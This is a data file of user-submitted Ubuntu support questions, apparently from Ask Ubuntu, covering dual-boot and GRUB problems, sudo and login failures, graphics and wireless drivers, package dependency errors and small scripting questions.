356137	move existing ubuntu 13.04 to a virtual machine on windows 8	so i currently have dual boot windows 8 and ubuntu 13.04 on a dell xps 13 laptop . ubuntu has a major problem with display drivers ( screen backlight ) that i have n't been able to solve , so i 'm looking for alternatives . i would like to use some kind of virtual machine program on windows that will boot up my existing linux install into a fullscreen window . i am after one of two scenarios : 1 ) something that would mount and boot my existing linux install from where it is , so i can still dual-boot if required . this seems like the cleanest option , and would make life very simple indeed . 2 ) a way to make a copy of everything from my existing ubuntu install onto a virtual machine , leaving me free to delete the linux partitions , and use ubuntu via vm only . scenario 1 is preferred . thanks for your help .
356138	root-system-bin package installation for root login	what is the use of root-system-bin package ? after installing this package can we able to login into the system as root user ?
356140	why does my keyboard fail after changing the sound ?	i just installed ubuntu 13.04 last night and i am already having some problems . whenever i change the sound on my pc by using fn + f6 / f7 / f8 ; the thing that drops down to tell you what level the sound at maxes out . it either goes to full volume or no volume and then it flashes for about a minute . once it has finished flashing i ca n't use my keyboard nor can i click on the items in the top right hand corner ; i ca n't even shut it down ( except for holding on the power button for 5 seconds ) or right click on the desktop to bring up the menu there . when i adjust the sound by using the mouse only there are no problems and the system works as it should . on another note , i was downloading a game through steam and when it was downloading i opened a video . the video was very loud and i changed the volume on the keyboard as i normally do . there was about 5 minutes to go on the download so i just waited for it to finish . i then launched the game and it opened , i still could n't use my keyboard though . when i restarted my pc i then tried playing the game again and all the files had gone and it started to download it once again . i 'm sorry i ca n't find the model name that i am using . i have these specs though : intel ( r ) core ( tm ) i7-3630qm cpu @ 2.40ghz 12.0gb ( 11.9 usable ) 64-bit operating system , x64-based processor
356145	bluetooth , and mouse and trackpad is not working	when booting after 10s disply is blinking , shows all files indicates ok except one . which goes like this : '' '' starting reload cups , upon starting avahi-daemon to make sure remote quere populated { fail } '' some time it might ok after the fail/error.. at that time mouse and pointer would not work if i shut down forcefully using power button , and restart everyting ok .
356146	windows boot problems	i have installed boot repair and now i boot ubuntu and windows 8 from the grub . however , the problem i have been facing is that my windows frequently hangs during boot and i can never shut down properly whenever that happens . as a result , when i subsequently boot to ubuntu i can not access the files on the various partitions other than those on the ubuntu ext4 partition . i once performed `` automatic repair '' on windows 8 ( after a windows boot failure and restart ) and consequently the grub ceased to be the default boot loader . hence i had to boot to ubuntu manually and run boot repair again . i wonder what has been going wrong . does disabling secure boot cause these problems ? any help would be much appreciated .
356147	grub menu entry misnamed	i recently installed several oses on my computer . i have a harddrive with windows , and one that shares ubuntu studio and kubuntu . now , my question is , when i boot up the computer , and im loaded into grub2 ( also note , im using the uefi version ) , it lists ubuntu studio as just plain ubuntu . this isnt really a problem as much as just a minor peeve . i could live with it , but , i wanted to know- how does one change the name in the grub menu . i know on older versions of grub , grub.cfg was a pretty simple looking file , but now its an ugly thing with no clear answers for me . i just want to change the order of a few entries , and rename a couple ^^ anyone able to help me ?
356153	xml.parsers.expat.expaterror problem ?	i am using python script for communicating with server from client . it is working fine , but since last weak the client is not able to communicate with server . then while check the code , it throws exception while calling wsdl class . the full line of code is given here . try : self.server = wsdl.proxy ( self.wsdlfile ) except xml.parsers.expat.expaterror : log.log ( 0 , '' error '' , _ ( `` could not connect to xmds . `` ) ) the 'self.wsdlfile ' contains my server address like 192.190.100.195/test.php ? wsdl.after executing the try block , the self.server has to store soapy.wsdl.proxy instance but , it contains none , it throws exception . i could not understand the real issue . note , the same python code is properly executing another system ( client ) . 1.how to resolve this issue ? 2.why this issue came ?
356154	invalid password 13.0	i had installed 64 bit ubuntu 13.04 on my desktop . for first two login it accept my password but from today system can not accept my password . i had not changed the password . please suggest solution to recover password .
356156	sudo command is not working	i 'm new to ubuntu . i 'm using ubuntu 13.04. my sudo comand is not working . can anyone help me. ? $ sudo sudo : unable to stat /etc/sudoers : permission denied sudo : no valid sudoers sources found , quiting sudo : unable to initialize policy pugin
356158	unable to access windows after ubuntu and grub installation	i 've been trying to solve this for a while , even had a topic here : i ca n't boot after ubuntu installation long story short , i installed ubuntu alongside windows 7 , replacing windows vista . now , when i turn on my computer , i get to grub with two options : ubuntu and windows 7 . ubuntu works well , but after i choose windows 7 , i get redirected to the windows grub-like environment , where i can choose either windows vista or ubuntu . neither of them works . anybody knows what am i ought to do now ? maybe making the grub option windows 7 turning on the windows 7 straight away ? thank you !
356160	gui for ubuntu server without internet	i am first time on this community . so , even i have a problem but i am still excited about it : ) . i recently installed ubuntu server edition 12.04 however i figured out that it did not install any gui ( as expected ) as it is a server opposed to desktop . now , i would like to install some stuff like the gnome/kde or alternative desktops . i know i need the internet for that however i do not have ethernet configured . i can only use wifi-dongle ( usb-n10 ) from asus which is basic and requires software i believe . in other words , i ca n't run apt-get to install further stuff into it . could anybody please help me with how i could install the gui without internet ( of course i have cd ) alternatively , i could install the usb driver which i believe must be trickier than the first choice . any help will be highly appreciated : ) , thank you in advance !
356162	ca n't install ubuntu and windows 7 x64 on same system - mbr uefi issue	i 'm trying to install windows 7x64 and ubuntu 13.04 x64 side by side on a laptop . i 've successfully installed each on the laptop . however , when windows is installed and i try to install ubuntu it does n't recognize my windows installation and says there is nothing on my hard drive . i only have the option to start from scratch with the hard drive . i had installed windows 7 to a partition , and left half the drive free to install ubuntu into . i tried both partitioning the partition intended for ubuntu and leaving it raw . neither worked . i then installed ubuntu first and when i go to install windows , it says it ca n't install to the partition because it 's partitioned as uefi . any ideas on how to dual boot and get both installed ? any help is much appreciated !
356164	problems with sudo commands	i 've been trying to install lamp server onto my ubuntu 12.04 lts and i can not get the sudo command to work . been getting the following error everytime i hit/install anything with sudo .
356166	how to automatically reset ubuntu after rebooting computer	i am working in a university and we are using ubuntu for all the computers . we are `` updating '' our students computers . what we would like to do is to reset our computers everytime after we reboot the computers . basically delteling all the files as the computers are only there for printing and research . i am sure that its possible but i am not exactly sure how to do it ! any help will be wonderful ! thank you very much in advance !
356169	how to start ubuntu-touch on nexus 7 3g tilapia ( nakasig ) ?	i am trying run ubuntu touch on my nexus 7 3g tilapia , but i only see the `` google '' splash screen . i have read many forums and found that the /data partition is different on tilapia and grouper ( mmcblk0p10 and mmcblk0p9 ) . how i can modify the cmdline and attach datapart=/dev/mmcblk0p10 on it ? ok i solve it 1.erase all on nexus ( optionally . i do it but not sure in my memory : ) ) 2. $ abootimg -x saucy-preinstalled-system-armel+grouper.img 3. edit bootimg.cfg cmdline = console=tty1 datapart=/dev/mmcblk0p10 4 . $ abootimg -- create saucy-preinstalled-system-armel+grouper.img -f bootimg.cfg -k zimage -r initrd.img 5. do fastboot flash all by official manual 6. go to recovery mode and format data , cache and sdcard partitions 7. reboot into recovery mode 8 . $ adb push /path/to/your/downloaded/saucy-preinstalled-touch-armel+grouper.zip /sdcard/autodeploy.zip 9. reboot into recovery mode and wait when install is finish 10. reboot into recovery mode second time 11 . $ adb push /path/to/your/downloaded/saucy-preinstalled-touch-armhf.zip /sdcard/autodeploy.zip 12. reboot into recovery mode and wait when install is finish . after install you got system . screen responds on power button ( lighter/darker ) . after some time it darkens . i try install vncserver , but it say : vncserver : the home environment variable is not set . sorry for my english .
356173	how can i get /usr/lib32 on my 32-bit ubuntu ?	how can i get /usr/lib32 on my 32-bit ubuntu ? this file is missing on my system .
356175	just installed ubuntu 13.04 and can not login	i just installed ubuntu 13.04 . i used wubi so i could have a windows dual boot setup because i am new to linux and wanted to be able to switch back to windows ( 7 ) if need be . everything seemed to install properly . i entered the initial information : installation size , drive , language , desktop envi , username , and password i rebooted my computer and selected ubuntu instead of windows , but when i enter my username and password ( the same exact credentials i had typed in for the initial information window a few min . ago ) it keeps giving me a wrong password error message . i can log in via a guest account , but cant do much from that . i can not connect to the internet except with ethernet cord . from the guest account i can not edit user accounts . [ one thing i did notice that i thought was odd is that on the initial information window i mentioned above i remember it saying ubuntu 12.04 but when i went into thew guest account and clicked system information it said i had ubuntu 13.04 ... . ] i am new to linux , but i 'm not a computer idiot and do not know what the problem could be ? ?
356178	how to dual boot windows xp and linux without loss of data	how can i dual boot without loss of data ? i meant to say how to install it without loss of data ? and which is the latest version of linux ?
356180	how do i find which ppa to remove from update ?	when i run apt-get update i get some failures at the end and i 'd like to remove them but i do n't know which ppa they are coming from . i have y-ppa manager installed , but still ca n't find where it is coming from . ign http : //packages.medibuntu.org raring/non-free translation-en err http : //packages.medibuntu.org raring/free amd64 packages 404 not found err http : //packages.medibuntu.org raring/non-free amd64 packages 404 not found err http : //packages.medibuntu.org raring/free i386 packages 404 not found err http : //packages.medibuntu.org raring/non-free i386 packages 404 not found ign http : //us.archive.ubuntu.com raring/main translation-en_us ign http : //us.archive.ubuntu.com raring/multiverse translation-en_us ign http : //us.archive.ubuntu.com raring/restricted translation-en_us ign http : //us.archive.ubuntu.com raring/universe translation-en_us ign http : //us.archive.ubuntu.com raring-updates/main translation-en_us ign http : //us.archive.ubuntu.com raring-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com raring-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com raring-updates/universe translation-en_us ign http : //us.archive.ubuntu.com raring-backports/main translation-en_us ign http : //us.archive.ubuntu.com raring-backports/multiverse translation-en_us ign http : //us.archive.ubuntu.com raring-backports/restricted translation-en_us ign http : //us.archive.ubuntu.com raring-backports/universe translation-en_us ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en fetched 1,302 kb in 17s ( 73.2 kb/s ) w : failed to fetch http : //packages.medibuntu.org/dists/raring/free/binary-amd64/packages 404 not found w : failed to fetch http : //packages.medibuntu.org/dists/raring/non-free/binary-amd64/packages 404 not found w : failed to fetch http : //packages.medibuntu.org/dists/raring/free/binary-i386/packages 404 not found w : failed to fetch http : //packages.medibuntu.org/dists/raring/non-free/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . $
356181	how to recover lost thumbnail and preview options ? [ solved ]	i am using ubuntu 12.04 lts on lenovo t500 with gnome desktop . i have to upload photos daily for work and 2 weeks ago lost thumbnails and the ability to select preview . i assume an update did 'something ' . settings are correct to show thumbnails always and i 've increased the size , but all i get are miniature boxes in my upload window . frustrating having to right down jpeg numbers and go from there ...
356182	how to do input redirection with nohup ?	i want to run python argument1.txt argument2.txt > logfile.log with nohup , but i get no output because it is redirecting the input to null . i want it to accept command line arguments at first and do work in nohup way . nohup python argument1.txt argument2.txt > logfile.log when i run the above command i get the following output . nohup : ignoring input and appending ... which means arguments are being ignored . in the manual it says that i have to do some input redirection , which i do n't know how to .
356197	to increase the home directory	i am using ubuntu 12.04 and i have installed redmine service for users who are working in php and testing . while they are using it , some of them are getting `` internal server error '' . actually my home directory space is too small when i checked the properties of redmine . it shows me as 0kb after cleaning cache by typing sudo apt-get autoclean & sudo apt-get clean . after that size of the directory increase to 20mb but it is not sufficient for 15 users . my question is do , i need to increase /home directory size ? is it possible to do it ? what are the ways to do that without losing data ?
356198	wireless driver not working	i have a problem using wireless in my laptop . i think the driver is not installed and all i am getting to that is a realtek driver . is there any methods to install/setup the required driver ?
356200	how do i output display at 2560x1080 ? ( am trying to add modeline with xrandr )	i 'm trying to use xrandr to add a custom resolution for my 2560x1080 aoc monitor . i 've been given the vesa timings by the manufacturer ( attached ) , but i 'm not sure what i should be doing with them : i 'm using cvt to generate a modeline ( cvt 2560 1080 60.00 ) , which generates : # 2560x1080 59.98 hz ( cvt ) hsync : 67.17 khz ; pclk : 230.00 mhz # modeline `` 2560x1080_60.00 '' 230.00 2560 2720 2992 3424 1080 1083 1093 1120 -hsync +vsync i can use xrandr to add that modeline , then add it to hdmi1 - but when i set the monitor to the new resolution , all i 'm getting from the monitor is flashing colours , until i drop it back to 1920x1080 @ 60.00 . the laptop i 'm using is an acer aspire v7-581pg - which has a 720m chip , so using optimus ( i also have bumblebee installed ) , but it seems that anything being output over hdmi uses the intel chip anyway ( which i believe is a 4400 chipset from the i5 ) if i go into nvidia-settings with : # optirun nvidia-settings -c :8 , i get to the settings menu , but no monitors are displayed there - so i assume everything 's being handled by the intel chip ? ) . i know the chipset can handle hdmi @ 2560x1080 , as windows 8 had no troubles outputting properly . i assume i 'm doing something wrong with the timings here , but i just ca n't work out what . i 've tried dropping the refresh rate down in decrements of 1 , all the way down to 40 , but i get the same result - once i get down to 47.00 , it just shows a black screen , rather than flashing colours . any help would be hugely appreciated . having a 21:9 monitor running at 1920x1080 is annoying enough to make me consider switching back to windows ! just to follow up , looking at the vesa timings , the nominal frequency is 181.250 , so i have tried the following but get the same issue : # modeline `` 2560x1080_60.00 '' 230.00 2560 2720 2992 3424 1080 1083 1093 1120 -hsync +vsync
356202	windows not seen	i was attempting to install ubuntu 13.04 on my computer that already has windows 7 . however during the installation i got a message saying that no operating system was found on the computer . the option to delete all the files and install ubuntu was the only one . i was n't given the choice install ubuntu parallel to windows 7 . can anyone tell me what i need to do to solve this problem ?
356204	can not update ubuntu 13.04	i can not get updates to work . here is message the following packages have unmet dependencies : libgtk-3-0 : depends : libwayland-client0 ( > = 1.0.2 ) but it is not installed depends : libwayland-cursor0 ( > = 1.0.2 ) but it is not installed when i run apt get -f it says i do not have permission . please help .
356205	installing new version of gromacs inubuntu	i followed answer to previous question on how to install latest version of gromacs latest version of gromacs and installed it but now when i run gromacs , it is telling me gromacs is not install you can install it by typing `` sudo apt-get install gromacs '' which is just installing it from repository ? any comments ? i want to install gromacs 4.6.3 and be able to run it from anywhere in terminal .
356217	how can i fix `` dpkg : error : parsing file '' ?	... and what is sudo and where/how would i type the scripts i 've seen in some related answers ? yes i am very new to linux , and am using ubuntu 12.04 lts . all updates are failing with installarchives ( ) failed : dpkg : error : parsing file '/var/lib/dpkg/available ' near line 2 package 'libgwibber-gtk2 ' : value for `status ' field not allowed in this context error in function : i need to know where and how i would input some of the sudo scripts etc . any help appreciated , trying to get off of windows ... . colin
356218	installer and directory structure	i 'm searching the internet for some days now but ca n't find info on where exactly the installer makes the file and folder directory structure and writes them on the disk . i know it complies with f.s.h . policy but i want to research the code and see how is this thing working and how it knows where to install what . thanks : )
356219	install lubuntu without formatting the entire harddrive	i am trying to install lubuntu 13.04 using the alternate iso on my dell inspiron 5150 ( 3ghz pentium 4 , 1 gb ram , 40gb hdd ) which already contains a non booting windows xp ( some boot.ini error ) . i downloaded the alternate iso from here : http : //cdimage.ubuntu.com/lubuntu/releases/13.04/release/lubuntu-13.04-alternate-i386.iso and used that to make a liveusb by using http : //www.linuxliveusb.com/ the liveusb boots up perfectly but when i attempt to install lubuntu at the partitioning stage it seems that the installer wants to format the entire hdd . i do n't want to do that because i have some data in the windows partition that i would like to recover using lubuntu . is there anyway to install lubuntu without messing with the windows partition ? i do not want to use the graphical installer ( and hence i am using the alternate iso ) since it seems to require a lot of ram ( i have only 1 gb ) thanks .
356220	audio only works when windows is hibernated on 13.04	when using ubuntu normally i have absolutely no audio output , but if i hibernate my install of windows 7 before booting into ubuntu the sound works flawlessly . i 'm using an acer aspire 3830tg on amd64 lubuntu with windows 7 enterprise . i can only assume it has something to do with the ntfs partitions being locked out . if anyone can offer a fix i would be very grateful .
356222	how to create automated script in ubuntu using text editor	where can i get the list or collections of syntax or command for terminal to manipulate my computer and or to create a simple application . i am familiar with vbs script and dos command to create some batches to automate my jobs in windows , now i am sing ubuntu 12.04 and my question is ... can i do the same thing using text editor in ubuntu such as the gedit ?
356224	after update trying to connect to wireless but i am already connected wired	after update 09. or 10.10.2013 ubuntu 12.04 ( xubuntu ) it is trying to connect to wireless but i am already connected wired .
356228	no network on a 12.10 lubuntu installation on acer aspire 1362	did my very first linux install to revive an old laptop ( acer aspire 1362 ; 2800+ sempron cpu , 512 ram ) . using the live cd i could get no wireless but did not try wired connection . after a clean install ( no dual boot ) everything seems to be okay except the network connectivity . the lspci command lists both the ethernet card ( via vt6102 ) and the wireless card ( inprocomm ipn2220 ) but only the first is assigned as eth0 . the ifconfig command shows that there is no ip assigned to the system . i have seen relavant posts by none with a definitive answer . one reported that using wicd instead of network manager will do the trick . can anyone confirm that this indeed works ? how do i install this since there is no internet connection ?
356230	is this a bug in gedit or a corrupted file ?	i tried to open file 10.txt in http : //www.ohjelmointiputka.net/tiedostot/mpera.zip by gedit . however , there seems to be some problems . is this a bug of a gedit or is that file somehow corrupted ? a similar file has not any problems except some slowness : # include < stdio.h > int main ( ) { file *fp ; int a=0 ; fp = fopen ( `` /tmp/test.txt '' , `` w '' ) ; for ( a=0 ; a < 100000 ; ++a ) { fprintf ( fp , `` fffg '' ) ; } fclose ( fp ) ; return 0 ; }
356231	how to disable bit torrent client	there is a lot of traffic generated by my transmission bit torrent client which i do n't use at all . i see that this application comes pre installed in ubuntu 12.04 . so , is there a way through which i can stop this traffic generated un necessarily by this torrent client or for better how can i uninstall this application . thanks . edit 1 . output of ps aux piped with transmission ps aux | grep transmission root 9276 0.0 0.0 13584 912 pts/2 s+ 16:22 0:00 grep -- color=auto transmission
356232	how to remove python2.6 and get python2.7	hello i am running ubuntu 10.04 that have python2.6 by default . i installed python2.7 doing sudo add-apt-repository ppa : fkrull/deadsnakes sudo apt-get update sudo apt-get install python2.7 but i can not get rid of python2.6 , how can i do it ? i did a full remove via synaptic which nearly killed the system , i had to reinstall gnome desktop ... i want only python2.7 on my system ...
356236	how to prevent certain windows from minimizing when doing `` show desktop ''	i am using xpad as the desktop note taking application and when window decorations are removed , it has a nice look and feel . but , the problem is when i do `` show desktop '' to come to desktop and take some notes , even the xpad windows are minimized . how do i prevent this from happening ?
356239	apache test screen showing after drupal install	problem i 'm running ubuntu server 13.04 . i installed drupal in the path below , running localhost/drupal/install.php /var/www/drupal drupal installed correctly but the address localhost/drupal redirects me to the apache test page rather than the drupal site as it normally does . what have i done wrong ? relevant log i 've tried to guess the relevant log as there is a lot of other stuff in there . [ thu oct 10 11:52:14 2013 ] [ error ] [ client 192.168.1.73 ] file does not exist : /var/www/drupal/drupal [ thu oct 10 11:52:16 2013 ] [ error ] [ client 192.168.1.73 ] file does not exist : /var/www/drupal/drupal
356240	how to install and play games in ubunto 12.04 like civilization5 etc.. in windows	every time i click install or execute exe files to install games , it just pup windows with written codes . i wanted to install and play games just like the way i did in my microsoft windows before what is the steps in doing this in ubuntu .
356241	ssid of my wireless network is missing in ubuntu 12.04 i can see other ssid 's	i am unable to connect to the wireless network from ubuntu 12.04 where as i can connect to the same wireless network via windows 7 , here is a snapshot of connected network in windows 7 the ssid to which i have to connect to is bsnl2 where as when i boot to ubuntu i can not connect to the wifi network you can see following snapshot the router does not even shows ssid bsnl2 ( to which i have to connect ) how ever ubuntu detects other ssids in my neighbourhood note in the snapshot of ubuntu the ssid bsnl2 is missing . following are the snapshots from my routers admin control panel i do not see the ssid bsnl2 in ubuntu 12.04 to which i have to connect.what is wrong here in ubuntu ? what more output should i post ? if you notice the first snapshot in windows 7 i see bsnl2 ssd with full signal strength and the computer is able to connect to it.so signal strength is also full ( i am sitting next to router ) , some thing needs to be covered in ubuntu , there is another ssid `` aashish suraj '' which is of my neighbour and i do not have to connect to it , the fact that ubuntu is able to see other ssids in my neighbour just shows that ubuntu wifi adaptors are also working correctly . is adsl router blocking ubuntu traffic , ( i have uploaded all snapshots ) the router is iball adsl2+ 150m wireless router
356243	true ubuntu on chromebook arm ( samsung )	i have installed ubuntu 13.04 on my desktop ( runs like a charm ) . then i used crouton to install ubuntu 12 . 04 on my chromebook samsung ( arm ) . it also works quite well . here comes my question . can we have a true ubuntu ( preferably 13.04 ) on my arm chromebook ? it seems that the crouton/ubuntu is not 100 % the real thing . the best option would be to have the full ubuntu 13.04 and remove the chrome os .
356244	seeking for a better solution to restrict access in grub2 menu	i just read that in certain situations you should also protect access to your grub2 menu by setting a password and may be refining acces by adding -- unrestricted or -- users as arguments to menuentries und submenus . i read the corresponding pages in the ubuntu community documentation and the arch wiki . so , i created /etc/grub.d/01_security , stored usernames and passwords in there , made the file executable and ran update-grub . this is working as intended , every action in the menu prompts for username and password , but i also want to modify the automatically generated entries to either restrict them to certain users ( via -- users ) or make them available for everyone , but not editable by everyone ( via -- unrestricted ) . i was able to find the proper lines in 10_linux and edit them accordingly , however i 'd love to see an easier solution . perhaps an option like grub_disable_recovery= '' true '' or grub_disable_os_prober=true in /etc/default/grub for easy ( re ) configuration ( for linux and os-prober generated entries ) . here 's a diff from my 13.10 installation : $ diff /etc/grub.d/10_linux /etc/grub.d/10_linux_bak 123c123 < echo `` menuentry ' $ ( echo `` $ title '' | grub_quote ) ' $ { class } -- unrestriced \ $ menuentry_id_option 'gnulinux- $ version- $ type- $ boot_device_id ' { `` | sed `` s/^ $ -- - > echo `` menuentry ' $ ( echo `` $ title '' | grub_quote ) ' $ { class } \ $ menuentry_id_option 'gnulinux- $ version- $ type- $ boot_device_id ' { `` | sed `` s/^/ $ submenu_inde $ 125c125 < echo `` menuentry ' $ ( echo `` $ os '' | grub_quote ) ' $ { class } -- unrestricted \ $ menuentry_id_option 'gnulinux-simple- $ boot_device_id ' { `` | sed `` s/^/ $ submenu_ $ -- - > echo `` menuentry ' $ ( echo `` $ os '' | grub_quote ) ' $ { class } \ $ menuentry_id_option 'gnulinux-simple- $ boot_device_id ' { `` | sed `` s/^/ $ submenu_indentation/ '' 323c323 < echo `` submenu -- unrestricted ' $ ( gettext_printf `` advanced options for % s '' `` $ { os } '' | grub_quote ) ' \ $ menuentry_id_option 'gnulinux-advanced- $ boot_device_ $ -- - > echo `` submenu ' $ ( gettext_printf `` advanced options for % s '' `` $ { os } '' | grub_quote ) ' \ $ menuentry_id_option 'gnulinux-advanced- $ boot_device_id ' { `` tl ; dr : i 'd love the see a simple solution for grub2 entries that can not be modified without a password or are limited to certain users . ( yes , grub_disable_recovery= '' true '' is active . )
356252	wlan samsung scx-4729fw only prints after being detected by wifi	i run lubuntu 13.04 64bit on a wired lan through a virginmedia 'superhub ' wireless router . i can print and scan on my samsung scx-4729fw mfd when the printer is connected wirelessly to the network . if i then connect the mfd to the lan by wire it continues to print and scan but it will only does so if the printer has been previously 'detected ' in wifi mode , and until the machine is rebooted . within the same session , the mfd will continue to work in wired mode even if the printer is disconnected and reconnected from the mains or the wired network . the wired network is a series of tp-link 'powerline ' adaptors ( lan runs through household mains cabling ) - one adaptor is plugged in to the wireless router . i would like the printer to be wired all the time . how can i print to the wire-connected mfd without initially disconnecting wires to initiate the wifi hookup ? i suspect this has something to do with ip addresses , dhcp and specifying configurations on startup ... additional information ( from mfd settings printout ) tcp/ipv4 ip assignment dhcp ; ip address 192.168.0.101 ; subnet mask 255.255.255.0 ; default gateway 192.168.0.1 tcp/ipv6 protocol disabled
356253	konsole commands in kubuntu	i am new user of kubuntu . i am using ubuntu 13.04 . could you tell me that how to use konsole ? since i am a new user i do n't know that what are the commands of konsole .
356257	google cloud engine instance connect through ssh problem	i was created google instance on google cloud account . and i want to access the instance via this commond gcutil ssh my-instance-name . after running this commond it 's gave ssh : connect to host ip-address port 22 : connection refused i was checked my firewall and deactivated . still i got this error please tell any one how to solve this
356260	you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server	im using kubuntu 13.04 64-bit on my dell inspiron 17r laptop . $ lspci|grep vga : 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 650m / gtx 660m le ] ( rev a1 ) i tried to install nvidia drivers , firstly , from system/additional drivers but with no effect , then i did : sudo apt-get purge nvidia* sudo apt-get autoremove nvidia-* sudo apt-get autoclean sudo apt-get autoremove sudo apt-get clean turned off all additional drivers from system/additional drivers sudo apt-get update & & sudo apt-get dist-upgrade -y sudo add-apt-repository ppa : bumblebee/stable sudo apt-get update sudo apt-get install bumblebee virtualgl linux-headers-generic bumblebee-nvidia restarted my laptop sudo apt-get install kde-window-manager sudo apt-get install mesa-utils and then tried : # nvidia-xconfig nvidia-xconfig : no command found so i did : # apt-get install nvidia-common but again ... . : # nvidia-xconfig nvidia-xconfig : no command found after all this , when i tried : nvidia-settings it showed me again : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server help !
356264	my mouse pointer switches from black to white on specific occasions	i installed the oxygen mouse cursor themes using these instructions : http : //www.youtube.com/watch ? v=2hu9jrdsxb8 now , i did it before and everything worked fine . but i had to reinstall ubuntu ( 12.04 ) in order to give it more space ( using 2 os 's ) and now this it what happens : i chose the oxygen black one and it is black for most of the time , but when it switches to the hand ( when you can click on something ) or the spinning wheel ( if something is being processed ) it turns white . also when the cursor is `` on '' a youtube video , sometimes it turns white . this is also the case with videos hosted on putlocker . how can i fix this ? ps : i 'm pretty new to ubuntu .
356265	ubuntu 12.04.3 installer stopped on activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout )	i have sony vaio laptop with windows 8 preinstalled . i am trying to install ubuntu 12.04.3 alongside windows 8 . i have made the bootable flash drive and ran ubuntu live from it . i clicked on the install ubuntu icon on desktop , completed all the formalities . now after downloading everything the installer is stuck on the following message : ubuntu network manager [ 2107 ] : info activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) completed . what should i do ? i am installing ubuntu for the first time .
356269	not detecting nvidia card	i had some issues with windows 8 ( the screen going randomly black and never reverting and it also had the usb disconnect specific sound ) . i tried to reinstall windows 8.1 then windows 8 but without success , i had the same issue over and over again . so i installed ubuntu thinking that it wo n't have any problems but after i checked the details under system settings and i 've seen that i only have the intel integrated display device . i have to mention that the laptop is a dell inspiron n5110 bought in may 2011 . i had ubuntu installed before but i can not tell since i have n't checked if this setting looked the same before the windows-crashes . i checked this answer too : question 1 i have to mention that being in safemode in windows 8 i could n't get to install the nvidia driver , it said that i do n't have that kind of device in my computer but i obviously do . i tried to install the drivers from nvidia website but it says the same : that i do not have a graphics card from nvidia . should i assume that my graphics card just got burnt and it is n't recognisable ? what should i do ? edit : as requested the output to lspci | grep vga is : vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 )
356271	hibernate possible after 12.04 ?	i ca n't hibernate . i always thought it was , because my first system on the hdd was 11.04 and i updated to 12.04 . after a couple of months i now decided to install 12.04 freshly , to be able to hibernate and i 've realized now , that it still is n't possible . could someone please tell me , if hibernate works with a newer version of ubuntu than 12.04 ? i rather prefer lts , but if this problem is now addressed , i would change the distribution or eventually even change the os , because i no longer want to work without hibernating . i have a thinkpad x200s . thanks ! edit : what i tried until now : pm-hibernate and on my old 12.04 system : s2disk with uswsusp ( this i have n't tried on my new installation yet , but all i rather wanted to know is , if hibernate works normally in newer ubuntu versions or if the same problems exist as with 12.04 )
356274	maximize , minimize , exit in the global menu	when i have a program like firefox and the terminal maximized i have the minimize , maximize and exit controls in the global menu ( at the top ) . i really do n't like it , is it possible to get it to the program like in gnome or windows ?
356275	unable to intall libboost	i get the following : myprompt : ~ $ sudo apt-get install libboost-all-dev reading package lists ... finished dependency tree status information is read ... finished some packages could not be installed . this may mean that you have requested an impossible situation or if the are using the unstable distribution that some required packages have not created or have not left incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libboost-all-dev : depends : libboost-date-time-dev but it is not installable depends : libboost-python-dev but it is not installable depends : libboost-thread-dev but it is not installable e : problems can not be corrected , you have held broken packages back . translated from german i have no clue why this is . tried to fix this according to some stuff found on the web ... like sudo apt-get -f install
356276	aeroo reports instalation issue	i currently have ubuntu 12.04.2 lts running openerp 7.0 . i need to know how can i correctly install aeroo reports . i need to create reports from a computer other than the server . do i require to install all dependencies and python libs on both server and client machines ? do i require do have libreoffice/openoffice installed on both server and client machine ? i was unable to make it work with the instructions googled even from alistek web site . can anyone send me a link or detailled instructions on how to make it work ? i think the problem is related to openoffice-headless , since i am unable to configure connection on the report_aeroo_ooo module . always get a failled connection . thank you very much regards paulo matos
356282	is it possible to define a macro variable through make ?	below is my c code : # include main ( ) { # ifdef hello printf ( `` hello `` ) ; # else printf ( `` else `` ) ; # endif } and my makefiles is : all : gcc uss_main.c -o out here i am trying to print hello by executing the binary out . i want to define the macro hello only at the time of doing make . i have tried using make hello=11but it only printing the else part , i am pretty new to make . please help me to enhance my makefile . thanks in advance .
356283	install pcmanfm v1.1.2.2	i want to install the newest version of pcmanfm on my ubuntu 13.04 machine . i have download the the newest version from here . now how do i actually install it and make it so that it is the system wide default ? there is another thread maybe that can be updated for ubuntu 13.04 and pcmanfm 1.1
356284	can not login after update ubuntu 12.04 . iceauthority error message	i left my computer on overnight and when i came to it this morning it offered to update ( i 'm on ubuntu 12.04 ) . so i updated and restarted , now when i want to login , i get the message : could not update ice authority file /home/user/.iceauthority i 'm getting this on all accounts . i ca n't see a way to get into the terminal to sort this out , as various threads i 've found suggest . if i use ctrl+alt+t nothing happens . if i use ctrl+f1then just go to a black screen . i tried using an old live cd ( ubuntu 8.04 ) but could n't get to terminal via that either . i made usb stick to boot 12.04 from but i have no option to boot from usb on the computer ( it has usb sockets , but it 's an old desktop ) .it 's only got cdrom/hdd/network boot as options . i ca n't burn a boot cd of 12.04 because the file is too big . can someone suggest a way to get to the terminal so i can fix this ?
